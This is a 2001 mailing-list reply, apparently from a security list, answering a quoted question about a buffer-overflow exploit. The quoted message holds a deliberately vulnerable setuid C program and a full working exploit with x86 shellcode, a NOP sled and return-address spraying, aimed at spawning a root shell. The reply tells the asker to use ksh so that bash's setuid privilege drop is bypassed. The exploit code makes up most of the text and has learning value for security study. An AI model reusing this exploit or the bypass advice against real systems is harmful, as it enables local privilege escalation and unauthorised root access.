Re: question on an exploit

[Neil Macvicar <neilm () foobarhouse com>]

hmm.. if your /bin/sh is a symlink to bash, then bash will automagivally
mute your setuid bit and rob you of your rightly gained permissions :p
Try using ksh instead.

Regards,
--Neil.

On Thu, 17 May 2001, roland kwitt wrote:

> hi folks,
>
>
> recently i found a very good howto about buffer overflowing
>
> and tried to code an exploit for a little program.
>
>
> #####################
> Prog. to be exploited
> #####################
>
> int main(int argc, char *argv[])
> {
>         char buffer[500];
>         if(argc>=2) strcpy(buffer, argv[1]);
>         return 0;
> }
>
>
> As anybody can see the program does not check the size of the
>
> input copied in buffer. Therefor it should be able to
>
> exploit it and gain root access through spawning a root shell.
>
> The perms of that prog are set to:
>
> 418444   16 -rwsr-xr-x   1 root     users       13335 May 17 15:22 vuln
>
>
> The exploit looks like this:
>
>
>
> #include <stdlib.h>
> #include <stdio.h>
>
> #define BUFFERSIZE 600  /* vulnerable buffer + 100 bytes */
>
> char linuxshell[] =
> "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0"
>
> "\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd"
>                     "\x80\xe8\xde\xff\xff\xff/bin/sh";
>
> unsigned long sp(void)
> {
>         __asm__("movl %esp, %eax");
> }
>
> void usage(char *cmd)
> {
>         printf("\nusage: %s <offset>\n\n", cmd);
>         exit(-1);
> }
>
> int main(int argc, char *argv[])
> {
>         int i, offset, os;
>         long esp, ret, *addr_ptr;
>         char *buffer, *ptr, *osptr;
>
>         if(argc<2) usage(argv[0]);
>
>         offset = atoi(argv[1]);
>         esp    = sp();
>         ret    = esp-offset;
>
>         printf("Stack pointer: 0x%x\n", esp);
>         printf("       Offset: 0x%x\n", offset);
>         printf("  Return addr: 0x%x\n", ret);
>
>         if(!(buffer = malloc(BUFFERSIZE))) {
>                 printf("Couldn't allocate memory.\n");
>                 exit(-1);
>         }
>
>         ptr = buffer;
>         addr_ptr = (long *)ptr;
>       for(i=0; i<BUFFERSIZE; i+=4)
>                 *(addr_ptr++) = ret;
>
>         for(i=0; i<BUFFERSIZE/2; i++)
>                 buffer[i] = '\x90';
>
>         ptr = buffer + ((BUFFERSIZE/2) - (strlen(linuxshell)/2));
>         for(i=0; i<strlen(linuxshell); i++)
>                 *(ptr++) = linuxshell[i];
>
>
>         buffer[BUFFERSIZE-1] = 0;
>         execl("./vuln", "vulnerable", buffer, 0);
>
>         return 0;
> }
>
> As a tried to execute the exploit using "exploit 0" (offset)
>
> the only thing i got was an ordinary user shell but not
>
> a root shell. Can somebody tell me why the setuid flag
>
> is ignored!!
>
>
> Thanks, sniper!!